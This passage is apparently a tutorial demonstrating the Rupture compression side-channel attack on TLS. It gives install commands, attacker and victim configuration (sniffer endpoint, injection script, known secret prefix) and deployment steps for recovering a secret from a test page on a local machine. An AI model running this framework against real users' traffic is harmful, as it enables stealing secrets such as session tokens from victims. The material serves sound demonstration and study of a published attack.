To bypass this obstacle, we measure the payload size of the encrypted packet. Since the search-guess is reflected on the response, the measured payload for a correct guess will be smaller than a false one, due to the fact that every packet is compressed before the encryption. This leads to a possible match.
For easier testing we have set up this page:
In this webpage we come across a plaintext which consists of numbers along with the word
bibendum. In this experiment
bibendum will be the target secret and the prefix
bibend will be the known secret prefix.
For simplicity purposes, during the test both the attacker and the victim components will be deployed on the same machine, instead of injecting a separate target. This will create the opportunity to measure the responses from https://ruptureit.com/test2.php and discover the next secret character of our target secret. Here are the complete steps of the Rupture attack:
First, we need to clone the source code from GitHub:
git clone https://github.com/dionyziz/rupture
This will create a folder named
rupture at the current directory. Then we needto
cd into the rupture folder and execute
./install.sh all in order to install the whole framework. There is also the option to install each module separately, as below:
rupture$ ./install.sh injection
rupture$ ./install.sh client
Rupture uses Python for the Command & Control server. Communication between Js Realtime server and Python backend is performed with a Django API endpoint.
rupture/ $ ./install.sh backend
rupture/ $ ./install.sh sniffer
After the installation we need to configure both the victim's as well as the target's parameters:
- target: A unique name identifying the target
- snifferendpoint: The HTTP endpoint of the adversarial sniffer running on the victim's network which is listening for our HTTP requests.
- sourceip: Victim's local network IP. Since victim will be deployed in our machine, sourceip should be equal to our local IP address.
- realtimeurl: The realtime module URL that the client should communicate with.
- interface: Attacking machine's interface. (Default is eth0)
- target: 'ruptureit'
- snifferendpoint: 'http://127.0.0.1:9000'
- sourceip: '192.168.1.2'
- realtimeurl: 'http://127.0.0.1:3031'
- interface: 'wlp2s0'
- endpoint: The endpoint in full URL form, including
https://. The endpoint string must contain a
%sto mark the position in which the string-to-be-reflected will be replaced into.
- prefix: The known prefix of the secret used to bootstrap the attack.
- alphabet: This set contain all the candidate symbols each character of the secret can be.
- secretlength: The length of the secret, if known. If the secret is unknown, this should be 0.
- alignmentalphabet: Alphabet used for block alignement. This will be shuffled once per batch.
- recordscardinality: The amount of expected TLS response records per request.
- method: Method of building candidate samplesets.
- endpoint: 'https://ruptureit.com/test2.php?reflection=%s'
- prefix: 'bibend'
- alphabet: 'abcdefghijklmnopqrstuvwxyz'
- secretlength: 8
- alignmentalphabet: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
- recordscardinality: 1
- method: 'serial'
After we specify the parameters, we need to setup the framework:
./rupture setup .
Since this is the first victim setup, inside the client directory, a folder named
client_1 will be created, containing injection script for the chosen victim.
Lastly, we need to deploy every component in order to start the attack. We can either start the attack with
./rupture attack or deploy each component separately (the last one is more preferable):
- Setup backend.
rupture $ ./rupture setup
- Deploy backend.
rupture $ ./rupture backend
- Deploy realtime.
rupture $ ./rupture realtime
- Deploy sniffer.
rupture $ ./rupture sniffer
Note: Sniffer deployment - either standalone or all together with 'attack' -
may need elevated privileges for simple users, since it requires access to
Since victim component will be deployed in our machine, we need to open the
test.html file through our browser, located in the
Depending on our network speed connection it may take a while, in order to steal the first character of the target secret. When the first round is completed a table will present all possible candidates in descending order of likelihood (backend window). If the total samples that we collected, indicate high enough confidence for the matching character, then the attack will continue by guessing the next possible character, like the first round. This process will continue recursively until the target secret is recovered.
This concludes the attack.